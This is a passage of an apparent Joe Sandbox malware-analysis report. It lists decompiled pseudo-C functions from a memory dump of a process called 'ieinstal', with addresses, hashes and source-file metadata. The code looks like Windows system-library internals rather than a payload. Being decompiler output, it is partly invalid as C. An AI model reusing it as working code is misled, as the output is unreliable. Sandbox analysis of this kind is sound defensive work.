										L1ED277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L1ED277F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x1edf7b04; // 0x8
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x1edf7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E1ED437C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x1edf7b9c; // 0x0
									_t214 = L1ED24620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E1ED437F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x1edf7b10 =  *0x1edf7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x1edf7b04 =  *0x1edf7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L1ED277F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L1ED277F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x1edf7b08 =  *0x1edf7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E1ED457C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E1ED4F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L1ED277F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E1ED3A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L1ED277F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E1ED496C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                        0x1ed1849b
                        0x1ed1849b
                        0x1ed1849b
                        0x1ed1849b
                        0x1ed1849d
                        0x1ed184a2
                        0x1ed184a7
                        0x1ed184b1
                        0x1ed184d8
                        0x00000000
                        0x1ed184b3
                        0x1ed184c4
                        0x1ed184c9
                        0x1ed184cd
                        0x1ed184cf
                        0x1ed184cf
                        0x1ed184d6
                        0x1ed184e6
                        0x1ed184e9
                        0x1ed184ec
                        0x1ed184ef
                        0x1ed184f2
                        0x1ed184f4
                        0x1ed184fc
                        0x1ed18501
                        0x1ed18506
                        0x1ed18509
                        0x1ed186e0
                        0x1ed186e5
                        0x1ed186e8
                        0x1ed186ed
                        0x1ed186f0
                        0x1ed186f2
                        0x1ed69afd
                        0x1ed69b02
                        0x1ed184da
                        0x1ed184df
                        0x1ed184df
                        0x1ed186fa
                        0x1ed186fd
                        0x1ed186fe
                        0x1ed18701
                        0x1ed18706
                        0x1ed18709
                        0x1ed1870b
                        0x00000000
                        0x00000000
                        0x1ed18711
                        0x1ed18725
                        0x1ed18727
                        0x1ed1872a
                        0x1ed1872c
                        0x1ed69af0
                        0x1ed69af5
                        0x1ed18732
                        0x1ed18732
                        0x1ed18732
                        0x1ed18735
                        0x1ed18737
                        0x1ed18515
                        0x1ed18515
                        0x1ed18518
                        0x1ed1851d
                        0x1ed18523
                        0x1ed18527
                        0x1ed1852b
                        0x1ed18537
                        0x1ed18539
                        0x1ed1853c
                        0x1ed1853e
                        0x1ed1868c
                        0x1ed18691
                        0x1ed18699
                        0x1ed1869b
                        0x1ed18744
                        0x1ed18748
                        0x1ed186a1
                        0x1ed186a1
                        0x1ed186a1
                        0x1ed186a4
                        0x1ed186a8
                        0x1ed69bdf
                        0x1ed69bdf
                        0x1ed186ae
                        0x1ed186b0
                        0x00000000
                        0x1ed186b6
                        0x00000000
                        0x1ed69be9
                        0x1ed186b0
                        0x1ed18544
                        0x1ed1854a
                        0x1ed1854d
                        0x1ed18551
                        0x1ed1876e
                        0x1ed18778
                        0x1ed1877b
                        0x1ed18780
                        0x1ed18557
                        0x1ed18557
                        0x1ed1855d
                        0x1ed1855d
                        0x1ed1856b
                        0x1ed1856e
                        0x1ed18570
                        0x1ed18573
                        0x1ed18576
                        0x1ed18576
                        0x1ed18579
                        0x1ed1857b
                        0x00000000
                        0x00000000
                        0x1ed18581
                        0x1ed185a0
                        0x1ed185a2
                        0x1ed185a5
                        0x1ed185a7
                        0x1ed69b1b
                        0x1ed69b1b
                        0x1ed1862e
                        0x1ed1862e
                        0x1ed18631
                        0x1ed18631
                        0x1ed18634
                        0x1ed18636
                        0x1ed18669
                        0x1ed18669
                        0x1ed1866b
                        0x1ed69bbf
                        0x1ed69bc4
                        0x1ed69bc8
                        0x1ed69bce
                        0x1ed69bce
                        0x1ed18671
                        0x1ed18671
                        0x1ed18674
                        0x1ed18676
                        0x1ed69bae
                        0x1ed69bae
                        0x1ed18676
                        0x1ed1867c
                        0x1ed1867e
                        0x1ed18688
                        0x1ed18688
                        0x00000000
                        0x1ed1867e
                        0x1ed18638
                        0x1ed18638
                        0x1ed1863b
                        0x1ed1863e
                        0x1ed1863f
                        0x1ed18642
                        0x1ed18645
                        0x1ed18648
                        0x1ed1864d
                        0x1ed69b69
                        0x1ed69b6e
                        0x1ed69b7b
                        0x1ed69b81
                        0x1ed69b85
                        0x1ed69b89
                        0x1ed69ba7
                        0x1ed69b8b
                        0x1ed69b91
                        0x1ed69b9a
                        0x1ed69b9f
                        0x1ed69b9f
                        0x1ed18788
                        0x1ed1878d
                        0x1ed18763
                        0x1ed18763
                        0x1ed18766
                        0x00000000
                        0x1ed18766
                        0x1ed69b70
                        0x00000000
                        0x1ed69b70
                        0x1ed18656
                        0x1ed1865a
                        0x1ed1865c
                        0x1ed18752
                        0x1ed18756
                        0x00000000
                        0x00000000
                        0x1ed1875e
                        0x00000000
                        0x1ed1875e
                        0x1ed18662
                        0x1ed18662
                        0x1ed18662
                        0x1ed18666
                        0x00000000
                        0x1ed18666
                        0x1ed185b7
                        0x1ed185b9
                        0x1ed185bc
                        0x1ed185bf
                        0x1ed185cc
                        0x1ed185d1
                        0x1ed185d4
                        0x1ed185db
                        0x1ed185de
                        0x1ed185e0
                        0x1ed69b5f
                        0x00000000
                        0x1ed69b5f
                        0x1ed185e6
                        0x1ed185ea
                        0x1ed186c3
                        0x1ed186c5
                        0x1ed186c8
                        0x1ed186ca
                        0x1ed69b16
                        0x00000000
                        0x1ed69b16
                        0x1ed186d6
                        0x1ed185f6
                        0x1ed185f6
                        0x1ed185f9
                        0x1ed18602
                        0x1ed18606
                        0x1ed1860a
                        0x1ed1860b
                        0x1ed1860e
                        0x1ed18611
                        0x00000000
                        0x1ed18611
                        0x1ed185f3
                        0x00000000
                        0x1ed185f3
                        0x1ed18619
                        0x1ed1861e
                        0x1ed1861e
                        0x1ed18621
                        0x1ed18622
                        0x1ed18623
                        0x1ed18625
                        0x1ed1862c
                        0x00000000
                        0x1ed1873d
                        0x00000000
                        0x1ed1873d
                        0x1ed18737
                        0x1ed1850f
                        0x1ed18512
                        0x00000000
                        0x1ed18512
                        0x00000000
                        0x1ed184d6

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 47edd2a2b44d3e6e17051d352f2bb3dae98d7bcc041763876cda7bdab4e4f520
                        • Instruction ID: 7cd7e4fe8bc3b030a094a6411527962bc06dd65224cbb67597f88915058a69f5
                        • Opcode Fuzzy Hash: 47edd2a2b44d3e6e17051d352f2bb3dae98d7bcc041763876cda7bdab4e4f520
                        • Instruction Fuzzy Hash: 01B16B78E00249DFDB14CFA9D991ADDFBB6FF48304F14462AE405AB385D770A946CB90
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED3513A, Relevance: .3, Instructions: 258COMMON
                        Download Yara Rule
                        C-Code - Quality: 67%
                        			E1ED3513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x1edfd360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E1ED4D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E1ED22280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L1ED24620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E1ED4F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E1ED1FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x1edfb1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E1ED4B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                        0x1ed35142
                        0x1ed3514c
                        0x1ed35150
                        0x1ed35157
                        0x1ed35159
                        0x1ed3515e
                        0x1ed35165
                        0x1ed35169
                        0x1ed3516c
                        0x1ed35172
                        0x1ed35176
                        0x1ed3517a
                        0x1ed3517a
                        0x1ed3517a
                        0x1ed3517f
                        0x1ed76d8b
                        0x1ed76d8e
                        0x1ed76d91
                        0x1ed76d95
                        0x1ed76d98
                        0x1ed76d9c
                        0x1ed76da0
                        0x1ed76da3
                        0x1ed76da7
                        0x1ed76e26
                        0x1ed76e26
                        0x1ed76e2a
                        0x1ed351f9
                        0x1ed351f9
                        0x1ed351fe
                        0x1ed76e33
                        0x1ed76e33
                        0x1ed76e39
                        0x1ed76e3d
                        0x1ed76e46
                        0x1ed76e50
                        0x00000000
                        0x00000000
                        0x1ed76e52
                        0x1ed76e53
                        0x1ed76e56
                        0x1ed76e5d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed76e5f
                        0x1ed76e67
                        0x1ed76e77
                        0x1ed76e7f
                        0x1ed76e80
                        0x1ed76e88
                        0x1ed76e90
                        0x1ed76e9f
                        0x1ed76ea5
                        0x1ed76ea9
                        0x1ed76eb1
                        0x1ed76ebf
                        0x00000000
                        0x00000000
                        0x1ed76ecf
                        0x1ed76ed3
                        0x00000000
                        0x00000000
                        0x1ed76edb
                        0x1ed76ede
                        0x1ed76ee1
                        0x1ed76ee8
                        0x1ed76eeb
                        0x1ed76eed
                        0x1ed76ef0
                        0x1ed76ef4
                        0x1ed76ef8
                        0x1ed76efc
                        0x00000000
                        0x00000000
                        0x1ed76f0d
                        0x1ed76f11
                        0x1ed76f32
                        0x1ed76f37
                        0x1ed76f3b
                        0x1ed76f3e
                        0x1ed76f41
                        0x1ed76f46
                        0x00000000
                        0x00000000
                        0x1ed76f4c
                        0x1ed76f50
                        0x1ed76f50
                        0x1ed76f54
                        0x1ed76f62
                        0x1ed76f65
                        0x1ed76f6d
                        0x1ed76f7b
                        0x1ed76f7b
                        0x1ed76f93
                        0x1ed76f98
                        0x1ed76fa0
                        0x1ed76fa6
                        0x1ed76fb3
                        0x1ed76fb6
                        0x1ed76fbf
                        0x1ed76fc1
                        0x1ed76fd5
                        0x1ed76fda
                        0x1ed76fda
                        0x1ed76fdd
                        0x1ed76fe2
                        0x1ed76fe7
                        0x1ed76feb
                        0x1ed76fef
                        0x1ed76ff3
                        0x1ed3520c
                        0x1ed3520c
                        0x1ed3520f
                        0x1ed35215
                        0x1ed35234
                        0x1ed3523a
                        0x1ed3523a
                        0x1ed35244
                        0x1ed35245
                        0x1ed35246
                        0x1ed35251
                        0x1ed35251
                        0x1ed76f13
                        0x1ed76f17
                        0x1ed76f17
                        0x1ed76f18
                        0x1ed76f1b
                        0x1ed76f1f
                        0x1ed76f23
                        0x00000000
                        0x1ed76f28
                        0x1ed35204
                        0x1ed35204
                        0x1ed35208
                        0x00000000
                        0x1ed35208
                        0x1ed35185
                        0x1ed35188
                        0x1ed3518a
                        0x1ed3518e
                        0x1ed35195
                        0x1ed76db1
                        0x1ed76db5
                        0x1ed76db9
                        0x1ed3519b
                        0x1ed3519b
                        0x1ed3519e
                        0x1ed351a7
                        0x1ed351a9
                        0x1ed351a9
                        0x1ed351b5
                        0x1ed351b8
                        0x1ed351bb
                        0x1ed351be
                        0x1ed351c1
                        0x1ed351c5
                        0x1ed351c9
                        0x1ed351cd
                        0x1ed351cd
                        0x1ed351d8
                        0x1ed351dc
                        0x1ed351e0
                        0x1ed76dcc
                        0x1ed76dd0
                        0x1ed76dd5
                        0x1ed76ddd
                        0x1ed76de1
                        0x1ed76de1
                        0x1ed76de5
                        0x1ed76deb
                        0x1ed76df1
                        0x1ed76df7
                        0x1ed76dfd
                        0x1ed76e01
                        0x1ed76e05
                        0x1ed76e09
                        0x1ed76e0d
                        0x1ed76e11
                        0x1ed76e11
                        0x1ed351eb
                        0x1ed76e1a
                        0x1ed76e1f
                        0x1ed76e21
                        0x1ed76e23
                        0x00000000
                        0x1ed351f1
                        0x1ed351f1
                        0x00000000
                        0x1ed351f1

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: cf63ccbd4f78e526b52fa16dd44559859d8ff402cc27952dcb13903f60798497
                        • Instruction ID: 753ca9bb07de67c5b5794baf8e293bf553554f06dd3e313930eb9282a91cc6ec
                        • Opcode Fuzzy Hash: cf63ccbd4f78e526b52fa16dd44559859d8ff402cc27952dcb13903f60798497
                        • Instruction Fuzzy Hash: 7DC127759083818FD354CF28C590A5AFBF2BF88308F148A6EF9998B352D771E945CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED303E2, Relevance: .3, Instructions: 254COMMON
                        Download Yara Rule
                        C-Code - Quality: 74%
                        			E1ED303E2(signed int __ecx, signed int __edx) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				intOrPtr _v40;
				signed int _v44;
				signed int _v48;
				char _v52;
				char _v56;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t56;
				signed int _t58;
				char* _t64;
				intOrPtr _t65;
				signed int _t74;
				signed int _t79;
				char* _t83;
				intOrPtr _t84;
				signed int _t93;
				signed int _t94;
				signed char* _t95;
				signed int _t99;
				signed int _t100;
				signed char* _t101;
				signed int _t105;
				signed int _t119;
				signed int _t120;
				void* _t122;
				signed int _t123;
				signed int _t127;

				_v8 =  *0x1edfd360 ^ _t127;
				_t119 = __ecx;
				_t105 = __edx;
				_t118 = 0;
				_v20 = __edx;
				_t120 =  *(__ecx + 0x20);
				if(E1ED30548(__ecx, 0) != 0) {
					_t56 = 0xc000022d;
					L23:
					return E1ED4B640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
				} else {
					_v12 = _v12 | 0xffffffff;
					_t58 = _t120 + 0x24;
					_t109 =  *(_t120 + 0x18);
					_t118 = _t58;
					_v16 = _t58;
					E1ED1B02A( *(_t120 + 0x18), _t118, 0x14a5);
					_v52 = 0x18;
					_v48 = 0;
					0x840 = 0x40;
					if( *0x1edf7c1c != 0) {
					}
					_v40 = 0x840;
					_v44 = _t105;
					_v36 = 0;
					_v32 = 0;
					if(E1ED27D50() != 0) {
						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t64 = 0x7ffe0384;
					}
					if( *_t64 != 0) {
						_t65 =  *[fs:0x30];
						__eflags =  *(_t65 + 0x240) & 0x00000004;
						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
							_t100 = E1ED27D50();
							__eflags = _t100;
							if(_t100 == 0) {
								_t101 = 0x7ffe0385;
							} else {
								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
							}
							__eflags =  *_t101 & 0x00000020;
							if(( *_t101 & 0x00000020) != 0) {
								_t118 = _t118 | 0xffffffff;
								_t109 = 0x1485;
								E1ED87016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
							}
						}
					}
					_t105 = 0;
					while(1) {
						_push(0x60);
						_push(5);
						_push( &_v64);
						_push( &_v52);
						_push(0x100021);
						_push( &_v12);
						_t122 = E1ED49830();
						if(_t122 >= 0) {
							break;
						}
						__eflags = _t122 - 0xc0000034;
						if(_t122 == 0xc0000034) {
							L38:
							_t120 = 0xc0000135;
							break;
						}
						__eflags = _t122 - 0xc000003a;
						if(_t122 == 0xc000003a) {
							goto L38;
						}
						__eflags = _t122 - 0xc0000022;
						if(_t122 != 0xc0000022) {
							break;
						}
						__eflags = _t105;
						if(__eflags != 0) {
							break;
						}
						_t109 = _t119;
						_t99 = E1ED869A6(_t119, __eflags);
						__eflags = _t99;
						if(_t99 == 0) {
							break;
						}
						_t105 = _t105 + 1;
					}
					if( !_t120 >= 0) {
						L22:
						_t56 = _t120;
						goto L23;
					}
					if( *0x1edf7c04 != 0) {
						_t118 = _v12;
						_t120 = E1ED8A7AC(_t119, _t118, _t109);
						__eflags = _t120;
						if(_t120 >= 0) {
							goto L10;
						}
						__eflags =  *0x1edf7bd8;
						if( *0x1edf7bd8 != 0) {
							L20:
							if(_v12 != 0xffffffff) {
								_push(_v12);
								E1ED495D0();
							}
							goto L22;
						}
					}
					L10:
					_push(_v12);
					_t105 = _t119 + 0xc;
					_push(0x1000000);
					_push(0x10);
					_push(0);
					_push(0);
					_push(0xf);
					_push(_t105);
					_t120 = E1ED499A0();
					if(_t120 < 0) {
						__eflags = _t120 - 0xc000047e;
						if(_t120 == 0xc000047e) {
							L51:
							_t74 = E1ED83540(_t120);
							_t119 = _v16;
							_t120 = _t74;
							L52:
							_t118 = 0x1485;
							E1ED0B1E1(_t120, 0x1485, 0, _t119);
							goto L20;
						}
						__eflags = _t120 - 0xc000047f;
						if(_t120 == 0xc000047f) {
							goto L51;
						}
						__eflags = _t120 - 0xc0000462;
						if(_t120 == 0xc0000462) {
							goto L51;
						}
						_t119 = _v16;
						__eflags = _t120 - 0xc0000017;
						if(_t120 != 0xc0000017) {
							__eflags = _t120 - 0xc000009a;
							if(_t120 != 0xc000009a) {
								__eflags = _t120 - 0xc000012d;
								if(_t120 != 0xc000012d) {
									_v28 = _t119;
									_push( &_v56);
									_push(1);
									_v24 = _t120;
									_push( &_v28);
									_push(1);
									_push(2);
									_push(0xc000007b);
									_t79 = E1ED4AAF0();
									__eflags = _t79;
									if(_t79 >= 0) {
										__eflags =  *0x1edf8474 - 3;
										if( *0x1edf8474 != 3) {
											 *0x1edf79dc =  *0x1edf79dc + 1;
										}
									}
								}
							}
						}
						goto L52;
					}
					if(E1ED27D50() != 0) {
						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					} else {
						_t83 = 0x7ffe0384;
					}
